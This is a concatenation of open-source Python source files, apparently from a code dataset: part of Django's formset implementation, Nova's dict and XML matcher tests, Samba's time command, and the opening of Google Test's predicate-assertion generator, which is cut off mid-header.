prefix=self.add_prefix('__prefix__'),
empty_permitted=True,
)
self.add_fields(form, None)
return form
@property
def cleaned_data(self):
"""
Returns a list of form.cleaned_data dicts for every form in self.forms.
"""
if not self.is_valid():
raise AttributeError("'%s' object has no attribute 'cleaned_data'" % self.__class__.__name__)
return [form.cleaned_data for form in self.forms]
@property
def deleted_forms(self):
"""
Returns a list of forms that have been marked for deletion.
"""
if not self.is_valid() or not self.can_delete:
return []
# construct _deleted_form_indexes which is just a list of form indexes
# that have had their deletion widget set to True
if not hasattr(self, '_deleted_form_indexes'):
self._deleted_form_indexes = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
if self._should_delete_form(form):
self._deleted_form_indexes.append(i)
return [self.forms[i] for i in self._deleted_form_indexes]
@property
def ordered_forms(self):
"""
Returns a list of form in the order specified by the incoming data.
Raises an AttributeError if ordering is not allowed.
"""
if not self.is_valid() or not self.can_order:
raise AttributeError("'%s' object has no attribute 'ordered_forms'" % self.__class__.__name__)
# Construct _ordering, which is a list of (form_index, order_field_value)
# tuples. After constructing this list, we'll sort it by order_field_value
# so we have a way to get to the form indexes in the order specified
# by the form data.
if not hasattr(self, '_ordering'):
self._ordering = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
# don't add data marked for deletion to self.ordered_data
if self.can_delete and self._should_delete_form(form):
continue
self._ordering.append((i, form.cleaned_data[ORDERING_FIELD_NAME]))
# After we're done populating self._ordering, sort it.
# A sort function to order things numerically ascending, but
# None should be sorted below anything else. Allowing None as
# a comparison value makes it so we can leave ordering fields
# blank.
def compare_ordering_key(k):
if k[1] is None:
return (1, 0) # +infinity, larger than any number
return (0, k[1])
self._ordering.sort(key=compare_ordering_key)
# Return a list of form.cleaned_data dicts in the order specified by
# the form data.
return [self.forms[i[0]] for i in self._ordering]
@classmethod
def get_default_prefix(cls):
return 'form'
def non_form_errors(self):
"""
Returns an ErrorList of errors that aren't associated with a particular
form -- i.e., from formset.clean(). Returns an empty ErrorList if there
are none.
"""
if self._non_form_errors is None:
self.full_clean()
return self._non_form_errors
@property
def errors(self):
"""
Returns a list of form.errors for every form in self.forms.
"""
if self._errors is None:
self.full_clean()
return self._errors
def total_error_count(self):
"""
Returns the number of errors across all forms in the formset.
"""
return len(self.non_form_errors()) +\
sum(len(form_errors) for form_errors in self.errors)
def _should_delete_form(self, form):
"""
Returns whether or not the form was marked for deletion.
"""
return form.cleaned_data.get(DELETION_FIELD_NAME, False)
def is_valid(self):
"""
Returns True if every form in self.forms is valid.
"""
if not self.is_bound:
return False
# We loop over every form.errors here rather than short circuiting on the
# first failure to make sure validation gets triggered for every form.
forms_valid = True
# This triggers a full clean.
self.errors
for i in range(0, self.total_form_count()):
form = self.forms[i]
if self.can_delete:
if self._should_delete_form(form):
# This form is going to be deleted so any of its errors
# should not cause the entire formset to be invalid.
continue
forms_valid &= form.is_valid()
return forms_valid and not bool(self.non_form_errors())
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self._non_form_errors.
"""
self._errors = []
self._non_form_errors = self.error_class()
if not self.is_bound: # Stop further processing.
return
for i in range(0, self.total_form_count()):
form = self.forms[i]
self._errors.append(form.errors)
try:
if (self.validate_max and
self.total_form_count() - len(self.deleted_forms) > self.max_num) or \
self.management_form.cleaned_data[TOTAL_FORM_COUNT] > self.absolute_max:
raise ValidationError(ungettext(
"Please submit %d or fewer forms.",
"Please submit %d or fewer forms.", self.max_num) % self.max_num,
code='too_many_forms',
)
if (self.validate_min and
self.total_form_count() - len(self.deleted_forms) < self.min_num):
raise ValidationError(ungettext(
"Please submit %d or more forms.",
"Please submit %d or more forms.", self.min_num) % self.min_num,
code='too_few_forms')
# Give self.clean() a chance to do cross-form validation.
self.clean()
except ValidationError as e:
self._non_form_errors = self.error_class(e.error_list)
def clean(self):
"""
Hook for doing any extra formset-wide cleaning after Form.clean() has
been called on every form. Any ValidationError raised by this method
will not be associated with a particular form; it will be accessible
via formset.non_form_errors()
"""
pass
def has_changed(self):
"""
Returns true if data in any form differs from initial.
"""
return any(form.has_changed() for form in self)
def add_fields(self, form, index):
"""A hook for adding extra fields on to each form instance."""
if self.can_order:
# Only pre-fill the ordering field for initial forms.
if index is not None and index < self.initial_form_count():
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), initial=index + 1, required=False)
else:
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), required=False)
if self.can_delete:
form.fields[DELETION_FIELD_NAME] = BooleanField(label=_('Delete'), required=False)
def add_prefix(self, index):
return '%s-%s' % (self.prefix, index)
def is_multipart(self):
"""
Returns True if the formset needs to be multipart, i.e. it
has FileInput. Otherwise, False.
"""
if self.forms:
return self.forms[0].is_multipart()
else:
return self.empty_form.is_multipart()
@property
def media(self):
# All the forms on a FormSet are the same, so you only need to
# interrogate the first form for media.
if self.forms:
return self.forms[0].media
else:
return self.empty_form.media
def as_table(self):
"Returns this formset rendered as HTML <tr>s -- excluding the <table></table>."
# XXX: there is no semantic division between forms here, there
# probably should be. It might make sense to render each form as a
# table row with each field as a td.
forms = ' '.join(form.as_table() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_p(self):
"Returns this formset rendered as HTML <p>s."
forms = ' '.join(form.as_p() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_ul(self):
"Returns this formset rendered as HTML <li>s."
forms = ' '.join(form.as_ul() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def formset_factory(form, formset=BaseFormSet, extra=1, can_order=False,
can_delete=False, max_num=None, validate_max=False,
min_num=None, validate_min=False):
"""Return a FormSet for the given form class."""
if min_num is None:
min_num = DEFAULT_MIN_NUM
if max_num is None:
max_num = DEFAULT_MAX_NUM
# hard limit on forms instantiated, to prevent memory-exhaustion attacks
# limit is simply max_num + DEFAULT_MAX_NUM (which is 2*DEFAULT_MAX_NUM
# if max_num is None in the first place)
absolute_max = max_num + DEFAULT_MAX_NUM
attrs = {'form': form, 'extra': extra,
'can_order': can_order, 'can_delete': can_delete,
'min_num': min_num, 'max_num': max_num,
'absolute_max': absolute_max, 'validate_min': validate_min,
'validate_max': validate_max}
return type(form.__name__ + str('FormSet'), (formset,), attrs)
def all_valid(formsets):
"""Returns true if every formset in formsets is valid."""
valid = True
for formset in formsets:
if not formset.is_valid():
valid = False
return valid
| apache-2.0 |
bgxavier/nova | nova/tests/unit/test_matchers.py | 66 | 14015 | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
import testtools
from testtools.tests.matchers import helpers
from nova.tests.unit import matchers
class TestDictMatches(testtools.TestCase, helpers.TestMatchersInterface):
matches_dict = OrderedDict(sorted({'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True, 'fluffy': False}}.items()))
matches_matcher = matchers.DictMatches(
matches_dict
)
matches_matches = [
{'foo': 'bar', 'baz': 'noox', 'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux', 'cat': {'tabby': True, 'fluffy': False}},
]
matches_mismatches = [
{},
{'foo': 'bar', 'baz': 'qux'},
{'foo': 'bop', 'baz': 'qux',
'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}},
{'foo': 'bar', 'cat': {'tabby': True, 'fluffy': False}},
]
str_examples = [
("DictMatches({0})".format(matches_dict),
matches_matcher),
]
describe_examples = [
("Keys in d1 and not d2: {0}. Keys in d2 and not d1: []"
.format(str(sorted(matches_dict.keys()))), {}, matches_matcher),
("Dictionaries do not match at fluffy. d1: False d2: True",
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}}, matches_matcher),
("Dictionaries do not match at foo. d1: bar d2: bop",
{'foo': 'bop', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': False}}, matches_matcher),
]
class TestDictListMatches(testtools.TestCase, helpers.TestMatchersInterface):
matches_matcher = matchers.DictListMatches(
[{'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'},
])
matches_matches = [
[{'foo': 'bar', 'baz': 'qoox',
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'}],
[{'foo': 'bar', 'baz': False,
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'}],
]
matches_mismatches = [
[],
{},
[{'foo': 'bar', 'baz': 'qoox',
'cat': {'tabby': True, 'fluffy': True}},
{'dog': 'yorkie'}],
[{'foo': 'bar', 'baz': False,
'cat': {'tabby': True, 'fluffy': False}},
{'cat': 'yorkie'}],
[{'foo': 'bop', 'baz': False,
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'}],
]
str_examples = [
("DictListMatches([{'baz': 'DONTCARE', 'cat':"
" {'fluffy': False, 'tabby': True}, 'foo': 'bar'},\n"
" {'dog': 'yorkie'}])",
matches_matcher),
]
describe_examples = [
("Length mismatch: len(L1)=2 != len(L2)=0", {}, matches_matcher),
("Dictionaries do not match at fluffy. d1: True d2: False",
[{'foo': 'bar', 'baz': 'qoox',
'cat': {'tabby': True, 'fluffy': True}},
{'dog': 'yorkie'}],
matches_matcher),
]
class TestIsSubDictOf(testtools.TestCase, helpers.TestMatchersInterface):
matches_matcher = matchers.IsSubDictOf(
OrderedDict(sorted({'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True, 'fluffy': False}}.items()))
)
matches_matches = [
{'foo': 'bar', 'baz': 'noox', 'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux'}
]
matches_mismatches = [
{'foo': 'bop', 'baz': 'qux',
'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}},
{'foo': 'bar', 'cat': {'tabby': True, 'fluffy': False}, 'dog': None},
]
str_examples = [
("IsSubDictOf({0})".format(
str(OrderedDict(sorted({'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True,
'fluffy': False}}.items())))),
matches_matcher),
]
describe_examples = [
("Dictionaries do not match at fluffy. d1: False d2: True",
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}}, matches_matcher),
("Dictionaries do not match at foo. d1: bar d2: bop",
{'foo': 'bop', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': False}}, matches_matcher),
]
class TestXMLMatches(testtools.TestCase, helpers.TestMatchersInterface):
matches_matcher = matchers.XMLMatches("""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child1>child 1</child1>
<child2>child 2</child2>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""", allow_mixed_nodes=False)
matches_matches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key2="spam" key1="spam"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children><child1>child 1</child1>
<child2>child 2</child2>
<child3>blah</child3>
</children>
</root>""",
]
matches_mismatches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key3="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="quux" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child4>child 4</child4>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
<child4>child 4</child4>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child2>child 2</child2>
<child1>child 1</child1>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""",
"""<?xml version="1.1"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child1>child 1</child1>
<child2>child 2</child2>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""",
]
str_examples = [
("XMLMatches('<?xml version=\"1.0\"?>\\n"
"<root>\\n"
" <text>some text here</text>\\n"
" <text>some other text here</text>\\n"
" <attrs key1=\"spam\" key2=\"DONTCARE\"/>\\n"
" <children>\\n"
" <!--This is a comment-->\\n"
" <child1>child 1</child1>\\n"
" <child2>child 2</child2>\\n"
" <child3>DONTCARE</child3>\\n"
" <?spam processing instruction?>\\n"
" </children>\\n"
"</root>')", matches_matcher),
]
describe_examples = [
("/root/text[1]: XML text value mismatch: expected text value: "
"['some other text here']; actual value: ['mismatch text']",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/attrs[2]: XML attributes mismatch: keys only in expected: "
"key2; keys only in actual: key3",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key3="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/attrs[2]: XML attribute value mismatch: expected value of "
"attribute key1: 'spam'; actual value: 'quux'",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="quux" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML tag mismatch at index 1: expected tag "
"<child2>; actual tag <child4>",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child4>child 4</child4>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML expected child element <child3> not "
"present at index 2",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML unexpected child element <child4> "
"present at index 3",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
<child4>child 4</child4>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML tag mismatch at index 0: "
"expected tag <child1>; actual tag <child2>",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child2>child 2</child2>
<child1>child 1</child1>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/: XML information mismatch(version, encoding) "
"expected version 1.0, expected encoding UTF-8; "
"actual version 1.1, actual encoding UTF-8",
"""<?xml version="1.1"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child1>child 1</child1>
<child2>child 2</child2>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""", matches_matcher),
]
class TestXMLMatchesUnorderedNodes(testtools.TestCase,
helpers.TestMatchersInterface):
matches_matcher = matchers.XMLMatches("""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<child3>DONTCARE</child3>
<!--This is a comment-->
<child2>child 2</child2>
<child1>child 1</child1>
<?spam processing instruction?>
</children>
</root>""", allow_mixed_nodes=True)
matches_matches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<attrs key2="spam" key1="spam"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
<text>some other text here</text>
</root>""",
]
matches_mismatches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
]
describe_examples = [
("/root: XML expected child element <text> not present at index 4",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
]
str_examples = []
| apache-2.0 |
urisimchoni/samba | python/samba/netcmd/nettime.py | 51 | 2007 | # time
#
# Copyright Jelmer Vernooij 2010 <jelmer@samba.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import samba.getopt as options
import common
from samba.net import Net
from samba.netcmd import (
Command,
)
class cmd_time(Command):
"""Retrieve the time on a server.
This command returns the date and time of the Active Directory server specified on the command. The server name specified may be the local server or a remote server. If the servername is not specified, the command returns the time and date of the local AD server.
Example1:
samba-tool time samdom.example.com
Example1 returns the date and time of the server samdom.example.com.
Example2:
samba-tool time
Example2 return the date and time of the local server.
"""
synopsis = "%prog [server-name] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_args = ["server_name?"]
def run(self, server_name=None, credopts=None, sambaopts=None,
versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp, fallback_machine=True)
net = Net(creds, lp, server=credopts.ipaddress)
if server_name is None:
server_name = common.netcmd_dnsname(lp)
self.outf.write(net.time(server_name)+"\n")
| gpl-3.0 |
Endika/omim | 3party/protobuf/gtest/scripts/gen_gtest_pred_impl.py | 2538 | 21986 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""gen_gtest_pred_impl.py v0.1
Generates the implementation of Google Test predicate assertions and
accompanying tests.
Usage:
gen_gtest_pred_impl.py MAX_ARITY
where MAX_ARITY is a positive integer.
The command generates the implementation of up-to MAX_ARITY-ary
predicate assertions, and writes it to file gtest_pred_impl.h in the
directory where the script is. It also generates the accompanying
unit test in file gtest_pred_impl_unittest.cc.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import sys
import time
# Where this script is.
SCRIPT_DIR = os.path.dirname(sys.argv[0])
# Where to store the generated header.
HEADER = os.path.join(SCRIPT_DIR, '../include/gtest/gtest_pred_impl.h')
# Where to store the generated unit test.
UNIT_TEST = os.path.join(SCRIPT_DIR, '../test/gtest_pred_impl_unittest.cc')
def HeaderPreamble(n):
"""Returns the preamble for the header file.
Args:
n: the maximum arity of the predicate macros to be generated.
"""
# A map that defines the values used in the preamble template.
DEFS = {
'today' : time.strftime('%m/%d/%Y'),
'year' : time.strftime('%Y'),
'command' : '%s %s' % (os.path.basename(sys.argv[0]), n),
'n' : n
}
return (
"""// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
//
// Implements a family of generic predicate assertion macros.
#ifndef GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
#define GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
// Makes sure this header is not included before gtest.h.
#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
# error Do not include gtest_pred_impl.h directly. Include gtest.h instead.
#endif // GTEST_INCLUDE_GTEST_GTEST_H_
// This header implements a family of generic predicate assertion
// macros:
//
// ASSERT_PRED_FORMAT1(pred_format, v1)
// ASSERT_PRED_FORMAT2(pred_format, v1, v2)
// ...
//
// where pred_format is a function or functor that takes n (in the
// case of ASSERT_PRED_FORMATn) values and their source expression
// text, and returns a testing::AssertionResult. See the definition
// of ASSERT_EQ in gtest.h for an example.
//
// If you don't care about formatting, you can use the more
// restrictive version:
//
// ASSERT_PRED1(pred, v1)
// ASSERT_PRED2(pred, v1, v2)
// ...
//
// where pred is an n-ary function or functor that returns bool,
// and the values v1, v2, ..., must support the << operator for
// streaming to std::ostream.
//
// We also define the EXPECT_* variations.
//
// For now we only support predicates whose arity is at most %(n)s.
// Please email googletestframework@googlegroups.com if you need
// support for higher arities.
// GTEST_ASSERT_ is the basic statement to which all of the assertions
// in this file reduce. Don't use this in your code.
#define GTEST_ASSERT_(expression, on_failure) \\
GTEST_AMBIGUOUS_ELSE_BLOCKER_ \\
if (const ::testing::AssertionResult gtest_ar = (expression)) \\
; \\
else \\
on_failure(gtest_ar.failure_message())
""" % DEFS)
def Arity(n):
"""Returns the English name of the given arity."""
if n < 0:
return None
elif n <= 3:
return ['nullary', 'unary', 'binary', 'ternary'][n]
else:
return '%s-ary' % n
def Title(word):
"""Returns the given word in title case. The difference between
this and string's title() method is that Title('4-ary') is '4-ary'
while '4-ary'.title() is '4-Ary'."""
return word[0].upper() + word[1:]
def OneTo(n):
"""Returns the list [1, 2, 3, ..., n]."""
return range(1, n + 1)
def Iter(n, format, sep=''):
"""Given a positive integer n, a format string that contains 0 or
more '%s' format specs, and optionally a separator string, returns
the join of n strings, each formatted with the format string on an
iterator ranged from 1 to n.
Example:
Iter(3, 'v%s', sep=', ') returns 'v1, v2, v3'.
"""
# How many '%s' specs are in format?
spec_count = len(format.split('%s')) - 1
return sep.join([format % (spec_count * (i,)) for i in OneTo(n)])
def ImplementationForArity(n):
"""Returns the implementation of n-ary predicate assertions."""
# A map the defines the values used in the implementation template.
DEFS = {
'n' : str(n),
'vs' : Iter(n, 'v%s', sep=', '),
'vts' : Iter(n, '#v%s', sep=', '),
'arity' : Arity(n),
'Arity' : Title(Arity(n))
}
impl = """
// Helper function for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
template <typename Pred""" % DEFS
impl += Iter(n, """,
typename T%s""")
impl += """>
AssertionResult AssertPred%(n)sHelper(const char* pred_text""" % DEFS
impl += Iter(n, """,
const char* e%s""")
impl += """,
Pred pred"""
impl += Iter(n, """,
const T%s& v%s""")
impl += """) {
if (pred(%(vs)s)) return AssertionSuccess();
""" % DEFS
impl += ' return AssertionFailure() << pred_text << "("'
impl += Iter(n, """
<< e%s""", sep=' << ", "')
impl += ' << ") evaluates to false, where"'
impl += Iter(n, """
<< "\\n" << e%s << " evaluates to " << v%s""")
impl += """;
}
// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
// Don't use this in your code.
#define GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, on_failure)\\
GTEST_ASSERT_(pred_format(%(vts)s, %(vs)s), \\
on_failure)
// Internal macro for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
#define GTEST_PRED%(n)s_(pred, %(vs)s, on_failure)\\
GTEST_ASSERT_(::testing::AssertPred%(n)sHelper(#pred""" % DEFS
impl += Iter(n, """, \\
#v%s""")
impl += """, \\
pred"""
impl += Iter(n, """, \\
v%s""")
impl += """), on_failure)
// %(Arity)s predicate assertion macros.
#define EXPECT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define EXPECT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define ASSERT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_FATAL_FAILURE_)
#define ASSERT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_FATAL_FAILURE_)
""" % DEFS
return impl
def HeaderPostamble():
"""Returns the postamble for the header file."""
return """
#endif // GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
"""
def GenerateFile(path, content):
"""Given a file path and a content string, overwrites it with the
given content."""
print 'Updating file %s . . .' % path
f = file(path, 'w+')
print >>f, content,
f.close()
print 'File %s has been updated.' % path
def GenerateHeader(n):
"""Given the maximum arity n, updates the header file that implements
the predicate assertions."""
GenerateFile(HEADER,
HeaderPreamble(n)
+ ''.join([ImplementationForArity(i) for i in OneTo(n)])
+ HeaderPostamble())
def UnitTestPreamble():
"""Returns the preamble for the unit test file."""
# A map that defines the values used in the preamble template.
DEFS = {
'today' : time.strftime('%m/%d/%Y'),
'year' : time.strftime('%Y'),
'command' : '%s %s' % (os.path.basename(sys.argv[0]), sys.argv[1]),
}
return (
"""// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
